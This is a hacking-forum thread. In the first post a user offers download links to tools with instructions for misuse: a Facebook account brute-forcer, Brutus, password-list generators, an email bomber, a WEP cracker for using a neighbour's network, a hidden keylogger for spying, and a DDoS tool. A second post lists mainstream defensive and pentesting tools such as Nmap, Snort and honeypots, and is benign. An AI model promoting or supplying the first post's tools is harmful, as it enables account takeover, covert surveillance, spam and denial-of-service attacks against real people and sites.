Best soft for hacker

Gucci

RIPPER
Messages
59
Reputation
-6
Reaction score
26
Points
18
Sorry to repost here . but i think its his place .

Admin finder

After you findthe passwords , use this tool to find the admin page login. Some people are heaving problems finding that page. This should solve this problem but remember that can't find all login pages. It use the most common extensions. You have the ability to add more extensions to the list to increase your search range

http://uploading.com/files/KCDVDDST/admi...r.rar.html


Email Bomber

This tool will help you to spam any email you want. This one is special because you have the ability to spam from different email at the same time.

http://uploading.com/files/ZC2HM6E1/7238...r.rar.html


My lock box

Many people were asking for tools to hide files and folders. This tool will hide the files that you don't want anyone to see it by hiding it inside a box that the software create and to make it impossible to anyone to reach it. Very easy to use

http://uploading.com/files/O0PDO80I/mylo...p.exe.html



Facebooz

Many people were asking on how to hack facebook account. This tool is design to hack any facebook account you want with 2 simple steps. Specify the username and the pass list and let it work.
It will hack that account and give you the pass.
And for idiots who say that it doesn't work. Well it works but it need times between each attemd to login otherwise it will become a facebooz freezer

http://uploading.com/files/8b949bb8/facebooz.jar/


Brutus

This tool will hack for you any login page by trying all password possibilities. The reason i added here is because many people were finding troubles with there brutus and couldn't do any hack so this one should solve all there nightmares.

http://uploading.com/files/ba745666/Brutus.rar/


PassList Generator

Many days ago someone post here in the forum a pass list that is 2GB size. I know that some people cannot download such a file including me so i did some search and found this tool. This software should create the pass list that you need to your brute force. Very small size but very big efficiency.

http://uploading.com/files/f8f9769b/PLG.zip/


Portable.Wireless WEP Key Password Spy v1

A very good software to hack any wireless wep connection that your wireless device can detect very quickly. You can use now your neighbor connection to do your dirty jobs and to get away with it. Remember always use proxy with it.

http://uploading.com/files/5ORJONUI/Port...l.rar.html


Ardamax Keylogger 3.1

This is a keylogger. You can register now any pressed key in a log file so you can check it later. Hide it from the eyes of the PC users and register there types. Ability to remote the log file via email to a email you have already specified. Very effective to spy on someone and especially kids in order to protect them from abuse.

http://uploading.com/files/348e28a8/Arda...ger31.rar/


Server Attack


Do a DDos attack to any website and paralyze it by increase the UDP Data sent to this website. In other words you will increase the request to open the webpage to 200 request at the same time which should paralyze the website targeted.

http://uploading.com/files/C1ZR8BH9/Serv...4.zip.html



Satan's Byte Adder 1.0

This tool is very useful to increase your applications size. Just drag and drop the file inside this tools and indicate how many KB you want to add. I use it very useful and works perfectly. All credits go to SpawnOfSatan.

http://uploading.com/files/9e178138/Sata...Adder.rar/
 

Jollier

Professional
Messages
1,127
Reputation
6
Reaction score
1,105
Points
113
Top 10 hacker tools for hacking, pentesting, and protecting systems.

1. Scanners for various tasks, penetration tests, hacking.
zenmap-5-topology-885x793-1.png

network scanner tools
  • OpenVAS - OpenVAS is a framework of several services and tools that offer a comprehensive and powerful solution for vulnerability verification and vulnerability management.
  • Metasploit Framework - A tool for developing and executing exploit code against a remote target machine. Other important subprojects include the Opcode database, the shellcode archive, and related research.
  • Kali - Kali Linux is a Debian-based Linux distribution designed for digital forensics and penetration testing. Kali Linux comes pre-installed with numerous pentest programs, including nmap (port scanner), Wireshark (packet analyzer), John the Ripper (password cracker), and Aircrack-ng (a software package for testing wireless local area networks).
  • pig - A tool for processing Linux packages.
  • scapy - Scapy: a Python-based interactive batch manipulation program and library.
  • Pompem - Pompem is an open source tool that is designed to automate the search for exploits in major databases. Developed on the basis of Python, it has an advanced search system, which facilitates the work of pentesters, as well as ethical hackers. In its current version, it searches databases: Exploit-db, 1337day, Packetstorm Security…
  • Nmap – Nmap it is a free and open source utility for network research and security verification.

2. Network monitoring, collecting data from open sources
  • justniffer – Justniffer is a network Protocol analyzer that captures network traffic and creates logs individually, can emulate Apache web server log files, track response times, and extract all" intercepted " files from HTTP traffic.
  • httpry-httpry is a specialized packet sniffer designed for displaying and logging HTTP traffic. It is not intended for the analysis itself, but only for collecting, processing and registering traffic for its subsequent analysis. It can be run in real-time, displaying traffic as it is parsed, or as a daemon process that registers in the output file. httpry is designed to be as light and flexible as possible, so it can be easily adapted to different applications.
  • ngrep-ngrep aims to provide most of the common GNU grep features by applying them at the network level. ngrep is a pcap-enabled tool that allows you to specify extended regular or hexadecimal expressions to match packet data payloads. It currently recognizes IPv4 / 6, TCP, UDP, ICMPv4 / 6, IGMP, and Raw over Ethernet, PPP, SLIP, FDDI, Token Ring, and null interfaces, and understands BPF filter logic in the same way as more common tools like tcpdump and snoop.
  • passivedns is a tool for passively collecting DNS records to help handle various types of incidents, network security monitoring (NSM), and General digital forensics. PassiveDNS examines traffic from the interface or reads the pcap file and outputs DNS server responses to a log file. PassiveDNS can cache / merge duplicate DNS responses in memory, limiting the amount of data in the log file, without losing the essence of the DNS response.
  • sagan-Sagan uses a "Snort like" engine and rules for log analysis (syslog/event log/snmptrap/netflow / etc).
  • Node Security Platform-Has a similar set of features as Snyk, but is free in most cases and very cheap for other types of cases.
  • ntopng-Ntopng is a network traffic Explorer that shows network usage, similar to what the popular Unix command does.
  • Fibratus – Fibratus is a tool for researching and tracking the Windows kernel. It is capable of capturing most of the Windows kernel activity the process of creating and terminating processes/threads, file system I / o, registry, network activity, DLL loading/unloading, and much more. Fibratus has a very simple CLI that encapsulates mechanisms for running a kernel event collector, sets up kernel event filters, or runs lightweight Python modules called filaments.

3. Intrusion prevention and protection Systems (IDS, IPS, Host IDS, Host IPS)
  • Snort-Snort is an open source network intrusion prevention system (NIPS) and network intrusion detection system (NIDS) created by Martin Roesch in 1998. Snort is now being developed by Sourcefire, where Roche is the founder and CTO. In 2009, Snort was inducted into the InfoWorld Hall of fame as one of The "greatest open source software projects of all time."
68747470733a2f2f73332e616d617a6f6e6177732e636f6d2f677261796c6f67626c6f672f736e6f72745f696e746567726174696f6e2f64617368626f6172642e706e67.jpg

Snort tools
  • Bro - Bro is a powerful network analysis framework that is very different from the typical IDS you might know.
  • OSSEC - stands for Comprehensive Open Source HIDS. Not for the faint of heart. It will take a long time to understand how it works. It is capable of performing log analysis, file integrity checking, rootkit detection, and provides real-time notification and active response. It runs on most operating systems, including Linux, MacOS, Solaris, HP-UX, AIX, and Windows. There is a lot of useful documentation that allows you to get acquainted with its principles of operation.
  • Suricata - Suricata is a high-performance network IDS, IPS, and network security monitoring engine. It is open source and belongs to a non-profit community-based Foundation called the Open Information Security Foundation (OISF). Suricata is developed by OISF and its supporting vendors.
  • Security Onion - security Onion is a Linux distribution for intrusion detection, network security monitoring, and log management. It is based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, Snorby, ELSA, Xplico, NetworkMiner and many other security tools. The easy-to-use setup Wizard lets you create an army of sensors for your enterprise in minutes!
  • sshwatch-IPS for SSH, similar to DenyHosts, written in Python. It can also collect information about the attacker in the log during the attack.
  • Stealth-provides you with a file integrity check that leaves virtually no trace. The controller starts from another computer, which makes it difficult for an attacker to understand that the file system is checked at certain pseudo-random intervals via SSH.Highly recommended for small to medium-sized work volumes.
  • AIEngine-AIEngine is a next-generation interactive/programmable Python/Ruby/Java/Lua engine for packet tracking with non-human learning capabilities, NIDS (Network Intrusion Detection System) functionality, DNS domain classification, network collector, network forensics, and more.
  • Denyhosts - Successfully resists SSH dictionary search attacks, as well as brute-force attacks.
  • Fail2Ban - Scans log files and takes appropriate measures against those IP addresses that show certain signs of malicious behavior.
  • SSHGuard – service protection Software in addition to SSH, written in C.
  • Lynis is an open source security verification and control tool for Linux / Unix.

4. network intelligence tools Honey Pot, Honey Net
honeypots-and-honeynets-11-638.jpg

Honey Pot tools.
  • HoneyPy-a HoneyPy is a low-to-medium interaction honeypot. It is designed for easy deployment, extending functionality with plugins, and applying custom configurations.
  • Conpot – ICS / SCADA Honeypot. Conpot is a small interactive honeypot server system designed for easy deployment, modification, and expansion. By providing a number of common production process management protocols, we have laid the foundations for building your own system that can emulate complex infrastructures to convince an attacker that they just found a huge industrial complex
  • Amun - Amun is a low-interaction Python-based Honeypot.
  • Glastopf - Glastopf is a Honeypot that emulates thousands of vulnerabilities to collect data on attacks targeting web applications. The principle behind it is very simple: give the correct answer to an attacker who uses a web application.
  • Kippo - Kippo is a medium-level SSH interaction honeypot designed to register brute-force attacks and, most importantly, all shell interaction performed by an attacker.
  • Kojoney - Kojoney is a low-interaction honeypot that emulates an SSH server. The daemon is written in Python using the Twisted Conch libraries.
  • HonSSH - HonSSH is a high interaction Honey Pot. HonSSH will be located between the attacker and the honey pot, creating two separate SSH connections between them.
  • Bifrozt - Bifrozt is a NAT device with a DHCP server that is typically deployed with one network adapter connected directly to the Internet and one network adapter connected to the internal network. What sets Bifrozt apart from other standard NAT devices is its ability to act as a transparent SSHv2 proxy server between the attacker and your honeypot.
  • HoneyDrive - HoneyDrive is the main Linux distribution for honeypot. This is a virtual device (OVA) with Xubuntu Desktop version 12.04.4 LTS installed. It contains more than 10 pre-installed and pre-configured honeypot software packages, such as Kippo SSH honeypot, dionaea and Amun malware baits, low-interaction Honeyd honeypot, glastopf and Wordpot web-based honeypot, scpad / ICS Conpot honeypot, thug and PhoneyC honeyclients, and others.
  • Cuckoo Sandbox - Cuckoo Sandbox is an open source software for automating the analysis of suspicious files. For this purpose, custom components are used that monitor the behavior of malicious processes while running in an isolated environment.

5. Capture network packets. Forensic systems
2014-05-19-jk7h5f1-tcpflow-all.jpg

tcpflow tools
  • tcpflow - tcpflow is a program that captures data transmitted as part of TCP connections (streams) and stores the data in a way that is convenient for Protocol analysis and debugging.
  • Xplico - the Goal of Xplico is to extract application data from Internet traffic. For example, Xplico extracts every email address (POP, IMAP, and SMTP protocols), all HTTP content, every VoIP call (SIP), FTP, TFTP, and so on from a pcap file.Xplico is not a network Protocol analyzer. Xplico is an open source forensic analysis tool (NFAT).
  • Moloch - Moloch is an open source IPv4 packet interceptor (packet capturing (PCAP)), with indexing and database systems. A simple web interface is provided for viewing, searching, and exporting PCAP. APIs that allow you to directly load PCAP data and session JSON data are displayed. Simple security is implemented by using https password support and HTTP digest, or by using apache. Moloch is not intended to replace the IDS engine, but instead works together with them to store and index all network traffic in the standard PCAP format, providing fast access. Moloch is designed to be deployed across multiple systems and can increase its performance to handle multiple gigabits of traffic per second.
  • OpenFPC - OpenFPC is a set of tools that combine to provide a lightweight full-band network traffic logger and buffering system. The goal of the project is to enable non-expert users to deploy a distributed network traffic recorder on COTS equipment when integrated into existing log and alert management tools .
  • Dshell - Dshell is a network for forensic analysis. Allows you to quickly develop plugins to support splitting network packet captures.
  • stenographer - Stenographer is designed for capturing packets, the purpose of which is to quickly collapse all of them to disk, and then provide easy and fast access to various subsets of these packets.

6. Network sniffers for working in local and wide area networks.
  • wireshark - Wireshark is a free and open source packet sniffer. It is used for Troubleshooting, analysis, software development and network communication, as well as training. Wireshark is very similar to tcpdump, but it has a graphical interface, as well as some integrated sorting and filtering options.
Wireshark-Analyze-Network-Traffic-in-Linux.png

Wireshark tools
  • netsniff-ng - netsniff-ng is a free set of tools for Linux. Its performance gains are achieved by using zero-copy mechanisms, so when receiving and transmitting packets, the kernel does not need to copy packets from kernel space to user space and Vice versa.

7. security information collection Systems and event management
  • Prelude is a universal security and event management system (SIEM). Prelude collects, normalizes, sorts, combines, matches, and reports all security-related events, regardless of the product brand or license. Prelude is delivered "agentless".
  • OSSIM - OSSIM provides all the features that security professionals need from the SIEM offering-event collection, normalization, and correlation.
  • FIR - Fast Incident Response, a cybersecurity incident management platform.

8. Encrypt traffic using a VPN
navigate_to_client_interface.jpg

  • OpenVPN is an open source application that implements virtual private network (VPN) methods.)) to create secure point-to-point or site-to-site connections in routed or bridged configurations and remote access tools. It uses a proprietary security Protocol that uses SSL/TLS for key exchange.

9. Processing a large number of packets
  • DPDK - DPDK is a set of libraries and drivers for fast packet processing.
  • PFQ - PFQ is a functional network framework developed for the Linux operating system that allows efficient capture/transfer of packets (10G OR more), functional processing in the kernel, and packets controlling via sockets/endpoints.
  • PF_RING - PF_RING is a new type of network socket that significantly improves the speed of packet capture.
  • PF_RING ZC (Zero Copy) - PF_RING ZC (Zero Copy) is a flexible batch processing framework that allows you to achieve a batch transfer rate of 1 to 10 Gbps (both RX and TX) at any packet size. It implements zero copy operations, including templates for interprocess and inter-VM configurations (KVMs).
  • PACKET_MMAP/TPACKET/AF_PACKET - it's Pretty good to use PACKET_MMAP to improve the performance of the capture and transfer process on Linux.
  • netmap - netmap is a platform for high-speed batch I / o. Together with its VALE software switch, IT is implemented as a single kernel module and is available for FreeBSD, Linux, and now also for Windows.

10. integrated protection Systems for workstations and servers - Firewall
  • pfSense is a distribution of the FreeBSD firewall and router.
  • OPNsense is an open, easy-to-use and easy-to-build firewall based on FreeBSD, as well as a routing platform. OPNsense includes most of the features available in expensive commercial firewalls, and much more in various cases. This brings a rich feature set of commercial offerings with the benefits of open and verifiable sources.
  • fwknop - Protects ports through authorization using a single cryptographic packet (Single Packet Authorization) in your firewall.

Docker images for conducting penetration testing and security
 
Top